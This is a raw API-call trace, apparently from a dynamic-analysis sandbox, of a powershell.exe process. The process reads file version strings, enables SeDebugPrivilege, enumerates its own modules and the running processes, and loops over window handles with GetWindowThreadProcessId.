	[0944.866] CoTaskMemAlloc (cb=0x2e) returned 0x459f20
	[0944.866] lstrcpyW (in: lpString1=0x459f20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0944.867] CoTaskMemFree (pv=0x459f20) 
	[0944.867] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07484, puLen=0x26df60) returned 1
	[0944.867] lstrlenW (lpString="System.Management.Automation") returned 28
	[0944.867] CoTaskMemAlloc (cb=0x3c) returned 0x424e80
	[0944.867] lstrcpyW (in: lpString1=0x424e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0944.867] CoTaskMemFree (pv=0x424e80) 
	[0944.867] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e074e0, puLen=0x26df60) returned 1
	[0944.867] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.868] CoTaskMemAlloc (cb=0x20) returned 0x45fb00
	[0944.868] lstrcpyW (in: lpString1=0x45fb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.868] CoTaskMemFree (pv=0x45fb00) 
	[0944.868] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07520, puLen=0x26df60) returned 1
	[0944.868] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.868] CoTaskMemAlloc (cb=0x44) returned 0x424e80
	[0944.868] lstrcpyW (in: lpString1=0x424e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.868] CoTaskMemFree (pv=0x424e80) 
	[0944.868] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07588, puLen=0x26df60) returned 1
	[0944.868] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0944.868] CoTaskMemAlloc (cb=0x76) returned 0x3fd3f0
	[0944.868] lstrcpyW (in: lpString1=0x3fd3f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0944.868] CoTaskMemFree (pv=0x3fd3f0) 
	[0944.868] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07624, puLen=0x26df60) returned 1
	[0944.868] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.868] CoTaskMemAlloc (cb=0x44) returned 0x424e80
	[0944.868] lstrcpyW (in: lpString1=0x424e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.868] CoTaskMemFree (pv=0x424e80) 
	[0944.868] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07688, puLen=0x26df60) returned 1
	[0944.868] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0944.868] CoTaskMemAlloc (cb=0x58) returned 0x3b5a70
	[0944.868] lstrcpyW (in: lpString1=0x3b5a70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0944.868] CoTaskMemFree (pv=0x3b5a70) 
	[0944.868] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07704, puLen=0x26df60) returned 1
	[0944.868] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.868] CoTaskMemAlloc (cb=0x20) returned 0x45fb00
	[0944.868] lstrcpyW (in: lpString1=0x45fb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.868] CoTaskMemFree (pv=0x45fb00) 
	[0944.869] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e073ac, puLen=0x26df60) returned 1
	[0944.869] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0944.869] CoTaskMemAlloc (cb=0x66) returned 0x3dc220
	[0944.869] lstrcpyW (in: lpString1=0x3dc220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0944.869] CoTaskMemFree (pv=0x3dc220) 
	[0944.869] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x0, puLen=0x26df60) returned 0
	[0944.869] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x0, puLen=0x26df60) returned 0
	[0944.869] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x0, puLen=0x26df60) returned 0
	[0944.869] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26df38, puLen=0x26df30 | out: lplpBuffer=0x26df38*=0x2e07354, puLen=0x26df30) returned 1
	[0944.870] CoTaskMemAlloc (cb=0x204) returned 0x401c70
	[0944.870] VerLanguageNameW (in: wLang=0x0, szLang=0x401c70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0945.552] CoTaskMemFree (pv=0x401c70) 
	[0945.552] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\", lplpBuffer=0x26df88, puLen=0x26df80 | out: lplpBuffer=0x26df88*=0x2e072e0, puLen=0x26df80) returned 1
	[0945.558] GetCurrentProcessId () returned 0x13e8
	[0945.575] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26ceb0 | out: lpLuid=0x26ceb0*(LowPart=0x14, HighPart=0)) returned 1
	[0945.578] GetCurrentProcess () returned 0xffffffffffffffff
	[0945.579] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26ced0 | out: TokenHandle=0x26ced0*=0x2e4) returned 1
	[0945.580] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2e0ab30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0945.582] CloseHandle (hObject=0x2e4) returned 1
	[0945.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13e8) returned 0x2e4
	[0946.300] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2e0ab98, cb=0x200, lpcbNeeded=0x26dee8 | out: lphModule=0x2e0ab98, lpcbNeeded=0x26dee8) returned 1
	[0946.302] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2e0ae08, cb=0x18 | out: lpmodinfo=0x2e0ae08*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0946.304] CoTaskMemAlloc (cb=0x804) returned 0x460600
	[0946.304] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x460600, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0946.304] CoTaskMemFree (pv=0x460600) 
	[0946.305] CoTaskMemAlloc (cb=0x804) returned 0x460600
	[0946.305] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x460600, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0946.305] CoTaskMemFree (pv=0x460600) 
	[0946.306] CloseHandle (hObject=0x2e4) returned 1
	[0946.314] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x13e8) returned 0x2e4
	[0946.315] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x26e018 | out: lpExitCode=0x26e018*=0x103) returned 1
	[0946.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e0b088, Length=0x20000, ResultLength=0x26dfe0 | out: SystemInformation=0x12e0b088, ResultLength=0x26dfe0*=0x4a190) returned 0xc0000004
	[0946.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e2b0b8, Length=0x4c990, ResultLength=0x26dfe0 | out: SystemInformation=0x12e2b0b8, ResultLength=0x26dfe0*=0x4a1e0) returned 0x0
	[0947.544] EnumWindows (lpEnumFunc=0x2c866ac, lParam=0x0) 
	[0947.546] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.546] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x558
	[0947.546] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.546] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.546] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x538
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x778
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x778
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.547] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x460
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2440
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x24d8
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1aa4
	[0947.548] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1ff0
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1a84
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1fb0
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1e10
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x23a8
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1f24
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x21ec
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2320
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1fd4
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1880
	[0947.549] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b18
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1d6c
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x233c
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2368
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2124
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x22f0
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x22ac
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1cdc
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x10f0
	[0947.550] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1f18
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x20a8
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2004
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1f88
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1f84
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2050
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1e04
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1ecc
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1e64
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b58
	[0947.551] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1e94
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1e28
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1df8
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1da8
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1c70
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x163c
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1a10
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x186c
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1d74
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4c8
	[0947.552] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1960
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1ce4
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b24
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x14e0
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x17f0
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x854
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1268
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1624
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b9c
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x16f4
	[0947.553] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x145c
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x17d0
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1d28
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xcb8
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1190
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x3a8
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1bd0
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1bfc
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1a78
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b90
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b04
	[0947.554] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b34
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1b64
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1bb0
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1acc
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1a2c
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x19a8
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1944
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x18c8
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x18ac
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x18ec
	[0947.555] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1898
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc98
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x153c
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1808
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x12a4
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1740
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x16c4
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1820
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x16ac
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1858
	[0947.556] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1664
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x10b4
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x10ac
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x10ec
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1068
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x17e0
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x102c
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x17a4
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1050
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1694
	[0947.557] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1770
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1720
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x165c
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1578
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x16c0
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x161c
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1638
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x15c8
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1554
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1674
	[0947.558] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1520
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x14bc
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xf8c
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe9c
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1434
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x14ec
